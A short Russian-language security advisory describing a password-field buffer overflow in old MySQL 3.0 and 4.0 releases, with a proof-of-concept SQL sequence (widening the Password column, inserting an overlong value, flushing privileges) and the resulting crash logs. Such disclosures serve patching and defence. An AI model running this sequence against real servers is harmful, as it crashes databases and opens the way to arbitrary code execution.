Программа: MySQL 3.0.х до 3.0.57 и MySQL 4.0.х до 4.0.14 

Переполнение буфера обнаружено в MySQL. Удаленный атакующий может
выполнить произвольный код на уязвимой системе.
Переполнение буфера обнаружено в функции проверки пароля. Удаленный
атакующий, имеющий административные привилегии на MySQL сервере, может
представить специально обработанное значение поля "Password", длиннее 16
символов, чтобы вызвать переполнение буфера и выполнить произвольный код с
привилегиями MySQL базы данных. На большинстве Linux систем, адрес возврата
можно перезаписать на 444 байта. 

Эксплоит: 

USE mysql; 
> ALTER TABLE User CHANGE COLUMN Password Password LONGTEXT; 
> UPDATE User SET Password = 
'123456781234567812345678123456781 234567812345678123456781234567812345678 
123456781234567812345678123456781 234567812345678123456781234567812345678 
123456781234567812345678123456781 234567812345678123456781234567812345678 
12345678123456781234567812345678... ' WHERE User = 'abcd'; 
> FLUSH PRIVILEGES; 
[Connection lost] 

mysqld_safe/safe_mysqld log : 

030806 21:05:43 mysqld restarted 
030806 21:05:43 mysqld restarted 
030806 21:05:43 mysqld restarted 
030806 21:05:43 mysqld restarted 
MySQL log : tons of 
mysqld got signal 11;

Оставить мнение